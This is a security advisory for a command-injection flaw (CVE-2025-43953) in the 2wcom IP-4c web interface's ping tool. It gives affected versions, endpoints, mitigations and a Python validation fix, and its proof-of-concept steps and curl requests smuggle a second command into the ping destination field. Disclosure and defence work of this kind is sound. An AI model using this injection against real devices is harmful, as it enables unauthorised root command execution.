### Critical Vulnerability Information

#### Vulnerability ID

CVE-2025-43953

#### Vulnerability Description

The web interface of 2wcom IP-4c allows authenticated attackers to perform remote code execution (RCE) via command injection. This occurs due to improper input sanitization in the ping tool configuration, leading to direct execution in the system shell.

#### Product Information

- **Name**: 2wcom IP-4c
- **Firmware/Software Versions**:
  - Bundle Version: 2.15.5
  - Ping/TraceRoute System Version: 2.78 / 2.02
- **Application Version**: 1.0.0
- **Web Interface Version**: 3.54
- **FPGA Version**: 1.76b6 / 0
- **System Controller Version**: 1.07
- **SNMP MIB Version**: 1.4
- **Kernel Version**: Linux version 01.25-r0
- **Codec Versions**:
  - MPV Encoder: 1.5.0
  - MPV Decoder: 2.7.0
  - MP3 Encoder: 5.1.2
  - MP3 Decoder: 5.6.0
  - AAC Encoder: 3.1.0
  - xHE-AAC Encoder: 04.05.04
  - AAC Decoder: 2.1.1
  - Opus: 1.3.1
  - G711: 1.7
  - HW Version XPSXP: 1.02 / 1.10

#### Vulnerability Type

- Remote Code Execution (Authenticated)

#### Attack Vector

- Network (Web Interface)

#### Vulnerable Endpoints

- `/cgi-bin/cam-request?cmd_data.ping&store=1`
- `/cgi-bin/cam-request?cmd_ping.php`
- `/cgi-bin/cam-request/check_trace.php`
- `/cgi-cgi` (via Web Interface accessing Ping TraceModule)

#### Exploitation Method

##### Exploitation via Web Interface

1. Log in as admin.
2. Navigate to `/cgi-bin/cam-request?cmd_data.ping&store=1`.
3. Set Destination (IP) to `127.0.0.1;whoami`.
4. Submit and wait for ping response.
5. The response will include the output of the `whoami` command.

##### Exploitation via API (cURL Example)

1. Send command injection:

   ```bash
   curl 'http:///cgi-bin/cam-request?cmd_data.ping&store=1' \
     -X POST \
     -H 'Content-Type: application/x-www-form-urlencoded' \
     --data-urlencode 'destination=127.0.0.1%3Bwhoami'
   ```

2. Check response:

   ```bash
   curl 'http:///cgi-bin/cam-request/cmd_ping.php' \
     -X POST \
     -H 'Cookie: PHPSESSID='
   ```

#### Impact

- Full system compromise as root
- Remote execution of arbitrary commands
- Potential lateral movement within the network

#### Discoverer

Mohamed Shahat

#### Reference Links

https://www.cve.org/CVERecord?id=CVE-2025-43953

#### Recommended Mitigation

- Sanitize user input in ping tool configuration (e.g., `ls`, `id`, etc.)
- Use secure APIs instead of direct shell execution
- Implement role-based access control

#### Temporary Workarounds

- Restrict access to `/cgi-bin/cam-request*` endpoints using firewall rules or VPN
- Monitor system logs for suspicious ping tool usage
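
The two code-level items under Recommended Mitigation (strict input validation and no direct shell execution) can be combined as in the following sketch. It is an added example, not 2wcom's code; the function names `validate_destination`, `ping_argv` and `run_ping` are hypothetical, and it assumes a `ping` binary that accepts `-c` and the getopt `--` end-of-options marker.

```python
import ipaddress
import re
import subprocess

# One RFC 1123 hostname label: letters, digits, hyphens; no leading/trailing hyphen.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_destination(value: str) -> str:
    """Return the destination if it is an IP literal or hostname, else raise."""
    if not isinstance(value, str) or not 0 < len(value) <= 253:
        raise ValueError("destination missing or too long")
    try:
        # Canonical IPv4/IPv6 text; anything with extra characters fails here.
        return str(ipaddress.ip_address(value))
    except ValueError:
        pass
    labels = value.rstrip(".").split(".")
    # fullmatch (not match) so a trailing newline or ';' cannot slip through.
    if all(_LABEL.fullmatch(label) for label in labels):
        return value
    raise ValueError("destination is not an IP address or hostname")


def ping_argv(destination: str, count: int = 3) -> list[str]:
    """Build the argument vector for ping without involving a shell."""
    dest = validate_destination(destination)
    if not 1 <= count <= 10:
        raise ValueError("count out of range")
    # "--" ends option parsing, so dest can never be read as a flag.
    return ["ping", "-c", str(count), "--", dest]


def run_ping(destination: str) -> str:
    # argv list with shell=False: no shell ever parses the destination.
    proc = subprocess.run(ping_argv(destination), capture_output=True,
                          text=True, timeout=30, shell=False, check=False)
    return proc.stdout


if __name__ == "__main__":
    # Constructed sample inputs; the second is the value from the steps above.
    for sample in ["127.0.0.1", "127.0.0.1;whoami", "-c5", "example.com"]:
        try:
            print(repr(sample), "->", ping_argv(sample))
        except ValueError as exc:
            print(repr(sample), "-> rejected:", exc)
```

Validation is an allow-list of what a destination may be rather than a block-list of shell metacharacters, and the argument vector keeps the value out of a shell even if a validation gap were found later.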